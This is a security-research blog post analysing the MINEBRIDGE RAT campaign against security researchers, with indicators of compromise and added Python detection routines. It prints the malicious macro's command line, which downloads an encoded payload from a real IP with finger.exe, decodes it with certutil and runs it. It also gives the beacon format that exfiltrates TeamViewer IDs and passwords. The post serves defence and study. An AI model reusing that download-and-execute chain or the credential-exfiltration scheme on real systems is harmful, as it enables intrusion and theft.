Introduction
In Jan 2021, Zscaler ThreatLabZ found new instances of the MINEBRIDGE remote-access Trojan (RAT) embedded in macro-based Word document files crafted to look like legitimate job resumes (CVs). Such lures are used as social engineering schemes by threat actors; in this case, the malware was targeted at security researchers.
Once activated, MINEBRIDGE buries itself into the vulnerable remote desktop software TeamViewer, enabling the threat actor to take a wide range of remote follow-on actions such as spying on users or deploying additional malware.
We have recently observed other instances of threat actors targeting security researchers with social engineering techniques. While the threat actor we discuss in this blog is not the same, the use of social engineering tactics targeting security teams appears to be on an upward trend.
We also observed a few changes in the tactics, techniques, and procedures (TTPs) of the threat actor since the last instance of MINEBRIDGE RAT was observed in March 2020. In this blog, we provide insights into the changes in TTPs, threat attribution, command-and-control (C&C) infrastructure, and a technical analysis of the attack flow.
Threat attribution
This attack was likely carried out by TA505, a financially motivated threat group that has been active since at least 2014. TA505 has previously been linked to very similar attacks using MINEBRIDGE RAT. The job resume theme and C&C infrastructure used in this new instance are consistent and in line with those former attacks. Due to the low volume of samples we identified for this new attack, we attribute it to the same threat actor with a moderate confidence level.
Attack flow
Figure 1 below details the attack flow.
Figure 1: Attack flow
Macro technical analysis
For the purpose of technical analysis of the attack flow, we will look at the macro-based Word document with the MD5 hash: f95643710018c437754b8a11cc943348
When the Word document is opened and the macros are enabled, it displays the message: “File successfully converted from PDF” for social engineering purposes.
This message is followed by displaying the decoy document as shown below. Figure 2 shows the contents of the decoy document, which resemble a job resume (CV) of a threat intelligence analyst.
Figure 2: Decoy file using the CV of a security researcher for social engineering purposes
The macro code uses basic string obfuscation as shown in Figure 3.
Figure 3: Contents of the obfuscated macro
It constructs the following command line and then executes it using Windows Management Instrumentation (WMI).
Command line: cmd /C finger nc20@184.164.146.102 > %appdata%\vUCooUr >> %appdata%\vUCooUr1 && certutil -decode %appdata%\vUCooUr1 %appdata%\vUCooUr.exe &&cmd /C del %appdata%\vUCooUr1 && %appdata%\vUCooUr.exe
This command leverages the Windows utility finger.exe to download encoded content from the IP address 184.164.146.102 and drops it in the %appdata% directory. The encoded content is decoded using the legitimate Windows utility certutil.exe and executed.
The usage of finger.exe to download the encoded content from the C&C server is one of the major TTP changes by this threat actor.
We see an increase in the usage of living-off-the-land binaries (LOLBins) by the threat actor to download, decode, and execute the content in this new instance.
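The download-decode-execute chain above lends itself to a process-creation detection. The following is an added example, not code from the original post: it scores constructed command lines with three rules and rates the full finger.exe plus certutil.exe chain highest. The sample command lines are constructed; the first reproduces the chain quoted above, the others are benign or lower-confidence lookalikes.

```python
import re

# Constructed process command lines (not real telemetry). The first mirrors the chain
# described above; the others are benign or lower-confidence lookalikes.
SAMPLE_COMMAND_LINES = [
    "cmd /C finger nc20@184.164.146.102 > %appdata%\\vUCooUr >> %appdata%\\vUCooUr1 "
    "&& certutil -decode %appdata%\\vUCooUr1 %appdata%\\vUCooUr.exe "
    "&&cmd /C del %appdata%\\vUCooUr1 && %appdata%\\vUCooUr.exe",
    "finger alice@bastion.example.internal",
    "certutil -verify -urlfetch server.cer",
    "certutil -decode C:\\Users\\bob\\Downloads\\blob.txt C:\\Users\\bob\\Downloads\\tool.exe",
]

# finger.exe pointed at user@host with its output redirected into a file: the download step.
FINGER_REDIRECT = re.compile(r"\bfinger(?:\.exe)?\s+\S+@\S+\s*>{1,2}\s*\S+", re.IGNORECASE)
# certutil.exe used as a decoder (-decode or -decodehex) rather than for certificates.
CERTUTIL_DECODE = re.compile(r"\bcertutil(?:\.exe)?\b[^&|]*\s-decode(?:hex)?\b", re.IGNORECASE)
# The file certutil wrote is invoked again later in the same command chain.
EXEC_AFTER_DECODE = re.compile(r"-decode(?:hex)?\s+\S+\s+(\S+\.exe)\b.*?\1",
                               re.IGNORECASE | re.DOTALL)


def classify_command_line(cmdline):
    """Return the rule names matched by one command line and a severity for the combination."""
    rules = []
    if FINGER_REDIRECT.search(cmdline):
        rules.append("finger_output_redirected")
    if CERTUTIL_DECODE.search(cmdline):
        rules.append("certutil_decode")
    if EXEC_AFTER_DECODE.search(cmdline):
        rules.append("decoded_file_executed")
    if len(rules) == 3:
        severity = "high"      # download, decode and execute in one chain
    elif "finger_output_redirected" in rules:
        severity = "medium"    # finger.exe rarely has a legitimate use in a modern estate
    elif rules:
        severity = "low"       # certutil -decode on its own is also used by admins
    else:
        severity = "none"
    return {"rules": rules, "severity": severity}


def scan(command_lines):
    """Classify every command line in a batch."""
    return [classify_command_line(c) for c in command_lines]
```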
Stage 1: SFX archive
MINEBRIDGE uses a self-extracting archive (SFX), decoded using certutil.exe, in order to execute. Details of this stage of the attack and the malicious binaries used are below.
MD5 hash of SFX archive: 73b7b416d3e5b1ed0aa49bda20f7729a
Contents of the SFX archive are shown in Figure 4. It spoofs a legitimate TeamViewer application.
Figure 4: Contents of the SFX archive
Upon execution, this SFX archive drops the legitimate TeamViewer binaries, a few DLLs and some document files.
Execution flow begins with the binary named defrender.exe, which is masked to look like a Windows Defender binary.
Stage 2: DLL Side Loading
The dropped binary defrender.exe is a legitimate TeamViewer application, version 11.2.2150.0, which is vulnerable to DLL side loading due to imprecise DLL references in the application’s library manifest. Upon execution, it loads the msi.dll binary present in the same directory. The msi.dll is the file that performs further malicious activity on the system.
Next, MSI.dll unpacks a shellcode and executes it. The part of the code responsible for shellcode unpacking and execution is shown in Figure 5.
Figure 5: Shellcode unpacking and execution
The shellcode further unpacks another DLL with MD5 hash 59876020bb9b99e9de93f1dd2b14c7e7 from a hardcoded offset, maps it into memory, and finally transfers code execution to its entry point. The unpacked DLL is a UPX-packed binary of MINEBRIDGE RAT.
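A detection check for the side-loading step described in Stage 2, added here as an illustration and not code from the original post: it runs over constructed image-load records (loading process plus loaded DLL path, in the shape Sysmon Event ID 7 or an EDR would report) and flags a DLL carrying a Windows system name, msi.dll here, that is loaded from anywhere other than System32/SysWOW64, noting whether it sits next to the loading executable. The system directory list and the sample paths are assumptions.

```python
import ntpath

# Directories a Windows system DLL is expected to load from (assumption: default install root).
SYSTEM_DLL_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
# System DLL names worth watching for side-loading; msi.dll is the one abused here.
WATCHED_DLLS = {"msi.dll"}

# Constructed image-load records: the loading process and the image it loaded.
# The first record mirrors the defrender.exe -> msi.dll chain described above.
SAMPLE_IMAGE_LOADS = [
    {"process": r"C:\ProgramData\Local Tempary\defrender.exe",
     "image": r"C:\ProgramData\Local Tempary\msi.dll"},
    {"process": r"C:\Program Files\TeamViewer\TeamViewer.exe",
     "image": r"C:\Windows\System32\msi.dll"},
    {"process": r"C:\ProgramData\Local Tempary\defrender.exe",
     "image": r"C:\ProgramData\Local Tempary\TeamViewer_Resource_en.dll"},
]


def sideload_finding(event):
    """Return a finding if a watched system DLL was loaded from a non-system path, else None."""
    image = event["image"]
    dll_name = ntpath.basename(image).lower()
    if dll_name not in WATCHED_DLLS:
        return None
    dll_dir = ntpath.dirname(image).lower()
    if dll_dir in SYSTEM_DLL_DIRS:
        return None  # the genuine msi.dll from System32/SysWOW64
    exe_dir = ntpath.dirname(event["process"]).lower()
    return {
        "process": event["process"],
        "dll": dll_name,
        "loaded_from": dll_dir,
        # Side-loading works by placing the DLL next to the executable, so this is the tell-tale.
        "colocated_with_exe": dll_dir == exe_dir,
    }


def find_sideloads(events):
    """Collect the findings for a batch of image-load events."""
    return [f for f in (sideload_finding(e) for e in events) if f is not None]
```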
Stage 3: MINEBRIDGE RAT DLL
On unpacking the UPX layer we get the main MINEBRIDGE RAT DLL with MD5 hash 23edc18075533a4bb79b7c4ef71ff314.
Execution checks
At the very beginning, MINEBRIDGE RAT confirms that the DLL is not executed via either regsvr32.exe or rundll32.exe.
If the command-line argument is __RESTART__ then it sleeps for 5 seconds and performs the operations described further below.
If the command-line argument is __START__ then it starts a BITS job to download a zip file-based payload and performs the operations described further below.
Figure 6 shows the relevant command-line checks performed by MINEBRIDGE RAT.
Figure 6: Module name and command-line argument check
BITS job download
The BITS job downloads a zip file by selecting a random C&C domain from the hardcoded list inside the DLL, using the path “/~4387gfoyusfh_gut/~3fog467wugrgfgd43r9.bin”. The downloaded payload is dropped to a hardcoded filename “~f834ygf8yrubgfy4sd23.bin” in the %temp% directory. When the download is completed, the zip file is extracted to “%ProgramData%\VolumeDrive”.
Figure 7 shows the relevant code section responsible for using bitsadmin to download the payload.
Figure 7: BITS job to download the payload file and extract it to %ProgramData%\VolumeDrive
After performing the above-mentioned checks, it loads the legitimate MSI.dll from the %System32% directory to initialize its own Export Address Table function. This is done to prevent application crashes when any of the export functions are called. It then generates the BOT_ID after doing some computations with the VolumeSerialNumber.
Figure 8: Export address table initialization and BOT_ID generation
API Hooking
MINEBRIDGE RAT then uses the mHook module to hook the following APIs, intercepting function calls in order to avoid unintentional exposure of malicious code execution to the user:
MessageBoxA
MessageBoxW
SetWindowTextW
IsWindowVisible
DialogBoxParamW
ShowWindow
RegisterClassExW
CreateWindowExW
CreateDialogParamW
Shell_NotifyIconW
ShellExecuteExW
GetAdaptersInfo
RegCreateKeyExW
SetCurrentDirectoryW
CreateMutexW
CreateMutexA
CreateFileW
GetVolumeInformationW
Since the last observed instance of this attack in 2020, a few more APIs have been added to the hook list, which are highlighted in bold above. Interestingly, the project path leaked by the mHook module remains unchanged:
C:\users\maximys\desktop\eric_guft@jabbeer.com\mhook_lib\mhook_lib\disasm-lib\disasm.c
Finally, if all the APIs are hooked successfully, MINEBRIDGE RAT creates three threads in sequence that perform the following tasks:
1. The first thread is responsible for C&C communication and achieving persistence.
2. The second thread gathers when the last input was received, to check the system idle status.
3. The third thread kills the ShowNotificationDialog process regularly to avoid any notification popups.
Figure 9: Hooks APIs and creates threads
Persistence
For persistence, MINEBRIDGE RAT creates a LNK file with the name “Windows Logon.lnk” in the startup directory. The LNK file points to the currently executing binary, with the same icon as “wlrmdr.exe” and the description “Windows Logon”.
Figure 10: LNK file properties showing target path and icon source
C&C communication
MINEBRIDGE RAT supports the following C&C commands:
● drun_command
● rundll_command
● update_command
● restart_command
● terminate_command
● kill_command
● poweroff_command
● reboot_command
● Setinterval_command
At the time of analysis, we did not receive any active response from the C2 server. However, based on the code flow, the communication mechanism appears to be the same as in previously reported attack instances. Detailed analysis of the C2 communication can be found in this report.
Alternate attack flow
The MINEBRIDGE RAT DLL also supports being executed via regsvr32.exe. The malicious code is present inside the DllRegisterServer export. When executed via regsvr32.exe or rundll32.exe, the DllMain routine won’t perform any actions, but regsvr32.exe also calls the DllRegisterServer export implicitly and, hence, the malicious code inside the DllRegisterServer export gets executed.
Interestingly, the check at the very beginning of the code inside the DllRegisterServer export verifies that the process name is regsvr32.exe and only then executes the code further.
We did not see this code path using regsvr32.exe triggered in the current attack instance, but it matches what has been reported in earlier instances by FireEye and the advisory report, with a few changes in filenames and payload directory.
Figure 11: Payload download from DllRegisterServer export
Zscaler Cloud Sandbox report
Figure 12 shows the sandbox detection for the macro-based document used in the attack.
Figure 12: Zscaler Cloud Sandbox detection
In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators at various levels.
Win32.Backdoor.MINEBRIDGE
VBA.Downloader.MINEBRIDGE
MITRE ATT&CK TTP Mapping
| ID | Tactic | Technique |
| --- | --- | --- |
| T1566.001 | Spearphishing Attachment | Uses document-based attachments with VBA macro |
| T1204.002 | User Execution: Malicious File | User opens the document file and enables the VBA macro |
| T1547.001 | Registry Run Keys / Startup Folder | Creates LNK file in the startup folder for payload execution |
| T1140 | Deobfuscate/Decode Files or Information | Strings and other data are obfuscated in the payloads |
| T1036.005 | Masquerading: Match Legitimate Name or Location | File name used is similar to the legitimate Windows Defender binary |
| T1027.002 | Obfuscated Files or Information: Software Packing | Payloads are packed in layers |
| T1574.002 | Hijack Execution Flow: DLL Side-Loading | Uses legitimate TeamViewer binary with DLL side-loading vulnerability |
| T1218 | Signed Binary Proxy Execution | Uses finger.exe for encoded payload download and certutil.exe to decode the payload |
| T1056.002 | Input Capture: GUI Input Capture | Captures TeamViewer-generated UserID and Password by hooking GUI APIs |
| T1057 | Process Discovery | Verifies the name of the parent process |
| T1082 | System Information Discovery | Gathers system OS version information |
| T1033 | System Owner/User Discovery | Gathers the currently logged-in username |
| T1071.001 | Application Layer Protocol: Web Protocols | Uses HTTPS for C&C communication |
| T1041 | Exfiltration Over C&C Channel | Data is exfiltrated using the existing C2 channel |
Indicators of compromise
Document hashes
f95643710018c437754b8a11cc943348
41c8f361278188b77f96c868861c111e
Filenames
MarisaCV.doc
RicardoITCV.doc
Binary hashes
73b7b416d3e5b1ed0aa49bda20f7729a [SFX Archive]
d12c80de0cf5459d96dfca4924f65144 [msi.dll]
59876020bb9b99e9de93f1dd2b14c7e7 [UPX packed MineBridge RAT]
23edc18075533a4bb79b7c4ef71ff314 [Unpacked MineBridge RAT]
C&C domains
// Below is a complete list of C&C domains related to this threat actor
Network paths
// The network paths below are accessed by MineBridge RAT using either HTTP GET or POST requests
/~4387gfoyusfh_gut/~3fog467wugrgfgd43r9.bin
/~8f3g4yogufey8g7yfg/~dfb375y8ufg34gfyu.bin
/~munhgy8fw6egydubh/9gh3yrubhdkgfby43.php
User-agent:
“Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B150 Safari/604.1”
Network data fetch using finger.exe
// Format: username@ip_address
nc20@184.164.146.102
Downloaded files
// Payloads are dropped in the following paths
%temp%/~f834ygf8yrubgfy4sd23.bin
%temp%/~t62btc7rbg763vbywgr6734.bin
%appdata%\vUCooUr1
%appdata%\vUCooUr.exe
%programdata%\Local Tempary\defrender.exe
%programdata%\Local Tempary\msi.dll
%programdata%\Local Tempary\TeamViewer_Desktop.exe
%programdata%\Local Tempary\TeamViewer_Resource_en.dll
%programdata%\Local Tempary\TeamViewer_StaticRes.dll
{STARTUP}\Windows Logon.lnk
Exfiltrated user and system data
// Format string
uuid=%s&id=%s&pass=%s&username=%s&pcname=%s&osver=%s&timeout=%d
The table below summarises the meaning of the individual fields.
| Field name | Purpose |
| --- | --- |
| uuid | BOT-ID of the user |
| id | TeamViewer ID of the user |
| pass | TeamViewer password |
| username | Currently logged-in user name |
| pcname | Name of the computer |
| osver | Operating system version |
| timeout | Timeout between requests |
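The beacon format and network indicators above, turned into a small request-inspection routine; this is an added example, not code from the original post. It parses a constructed POST body into the fields of the table, redacts the TeamViewer password before it lands in an alert, and combines the URI paths and the user agent listed under the indicators; the hostnames and field values in the sample requests are made up.

```python
from urllib.parse import parse_qs

# Indicators from the post: the "Network paths" list and the user agent quoted above.
MINEBRIDGE_PATHS = {
    "/~4387gfoyusfh_gut/~3fog467wugrgfgd43r9.bin",
    "/~8f3g4yogufey8g7yfg/~dfb375y8ufg34gfyu.bin",
    "/~munhgy8fw6egydubh/9gh3yrubhdkgfby43.php",
}
MINEBRIDGE_UA = ("Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) "
                 "AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B150 Safari/604.1")
# Field names of the format string uuid=%s&id=%s&pass=%s&username=%s&pcname=%s&osver=%s&timeout=%d
BEACON_FIELDS = {"uuid", "id", "pass", "username", "pcname", "osver", "timeout"}
STRONG_SIGNALS = {"known_minebridge_path", "beacon_field_set"}

# Constructed proxy-log style records; hosts, IDs and values are made up, not real IoCs.
SAMPLE_REQUESTS = [
    {"host": "c2-placeholder.invalid", "method": "POST", "user_agent": MINEBRIDGE_UA,
     "path": "/~munhgy8fw6egydubh/9gh3yrubhdkgfby43.php",
     "body": "uuid=CONSTRUCTED-BOT-ID&id=123456789&pass=s3cret&username=alice"
             "&pcname=WS01&osver=10.0.19042&timeout=60"},
    {"host": "www.example.com", "method": "GET", "user_agent": MINEBRIDGE_UA,
     "path": "/index.html", "body": ""},
    {"host": "cdn.example.net", "method": "GET", "user_agent": "curl/8.0",
     "path": "/~4387gfoyusfh_gut/~3fog467wugrgfgd43r9.bin", "body": ""},
]


def inspect_request(req):
    """Return the indicator matches for one request, plus the parsed beacon if the body is one."""
    reasons = []
    if req["path"] in MINEBRIDGE_PATHS:
        reasons.append("known_minebridge_path")
    # A Windows host presenting an iPhone Safari UA is odd, but alone it is only a weak signal.
    if req["user_agent"] == MINEBRIDGE_UA:
        reasons.append("minebridge_user_agent")
    beacon = None
    if req["method"] == "POST" and req["body"]:
        fields = parse_qs(req["body"], keep_blank_values=True)
        if set(fields) == BEACON_FIELDS:
            reasons.append("beacon_field_set")
            beacon = {k: v[0] for k, v in fields.items()}
            beacon["pass"] = "<redacted>"  # TeamViewer password: keep it out of alert storage
    severity = "high" if STRONG_SIGNALS & set(reasons) else ("low" if reasons else "none")
    return {"host": req["host"], "reasons": reasons, "severity": severity, "beacon": beacon}


def inspect_all(requests):
    """Inspect a batch of request records."""
    return [inspect_request(r) for r in requests]
```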
*** This is a Security Bloggers Network syndicated blog from Research Blogs Feed authored by Sudeep Singh. Read the original post at: https://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures